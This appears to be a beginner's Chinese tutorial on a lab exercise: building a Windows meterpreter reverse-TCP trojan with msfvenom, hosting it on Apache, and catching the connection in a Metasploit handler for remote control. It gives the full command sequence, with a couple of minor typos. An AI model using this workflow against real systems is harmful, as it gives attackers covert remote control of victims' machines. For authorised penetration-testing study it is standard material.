从零学网安第四期--在kali里面制作木马程序并实现远程控制

在网络安全领域，渗透测试与漏洞挖掘是保障系统安全的重要手段。本文将详细介绍如何利用Kali结合Metasploit框架制作Windows木马，并完成完整的攻击链路演示（注：本文仅用于合法的渗透测试与安全研究，未经授权的攻击行为涉嫌违法犯罪，务必遵守法律法规）。

一、实验环境与工具准备

1.攻击机：kali(内置Metasploit框架、Apache服务)，IP地址以实际测试环境为准。

2.靶机：Windows系统（用于测试木马运行效果）。
3. 核心工具：Metasploit（msfconsole）、msfvenom、Apache2服务。

二、实验步骤详解

（一）制作Windows木马程序

木马制作核心使用 msfvenom 工具，该工具可生成包含特定攻击载荷的可执行文件，本次采用反向TCP连接模式（目标机主动连接攻击机，突破防火墙限制）。

1. 打开Kali终端，执行以下命令生成木马：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<四位数端口号> -f exe > shell.exe

参数说明： -p 指定攻击载荷（反向TCP连接）； LHOST 为攻击机IP（目标机回连地址）； LPORT 为监听端口（需确保端口未被占用）。

(二)搭建文件服务器，使靶机可下载木马

为了让靶机获取木马文件，我们利用Kali内置的Apache2服务搭建简易文件服务器：

1. 将生成的木马文件移动到Apache2的网页根目录：

mv shell.exe var/www/html

2.启动Apache2服务：

service apache2 start

3. 验证服务是否搭建成功：
在浏览器访问 http://(攻击机IP)/shell.exe ，若能正常下载文件，说明Apache2服务配置成功。

（三）攻击机开启监听，等待靶机连接

木马运行后会主动回连攻击机，需提前在Metasploit中配置监听模块，等待目标机接入：

1. 启动Metasploit控制台：

msfconsole #若已启动可以跳过该步骤

2.加载监听模块：

use exploit/multi/handler

3. 配置监听参数：

set payload windows/meterpreter/reverse_tcp #这里payload要和前面的一致

4.监听所有网卡：

et LHOST 0.0.0.0 # 监听所有网卡接口 set LPORT 9999 # 与木马生成端口一致

5.运行程序：

run

（四）靶机执行木马，建立远程连接

1. 将生成的 shell.exe 木马文件拷贝至Windows靶机（模拟合法的文件传输场景）。
2. 靶机双击运行木马文件（注：运行前需关闭靶机安全防护软件，避免木马被拦截）。
3. 回到Kali攻击机的Metasploit终端，若显示 Meterpreter session 1 opened ，说明连接成功，此时已获取靶机的远程控制权限。

三、实验总结与安全建议

本次实验完整演示了从木马生成、文件传输到远程控制的全流程，核心原理是利用Metasploit的攻击载荷与监听模块，实现攻击机与靶机的反向连接。

建议如果遇到不确定的文件可以到把文件拖到微部社区，里面有一键分析功能，可以分析是否是木马文件，棱角社区也是一个不错的选择。

木马通常会拷贝到Windows的以下几个常见目录：

临时目录（最常见）：

C:\Windows\Temp\

%TEMP% （环境变量，直接在运行里输入或在Meterpreter里执行 getenv TEMP 查看）

用户下载目录：

C:\Users\用户名\Downloads\

用户桌面：

C:\Users\用户名\Desktop\

感谢大家的阅读，本人是新手小白，请放心点评任何建议都接受。谢谢！！！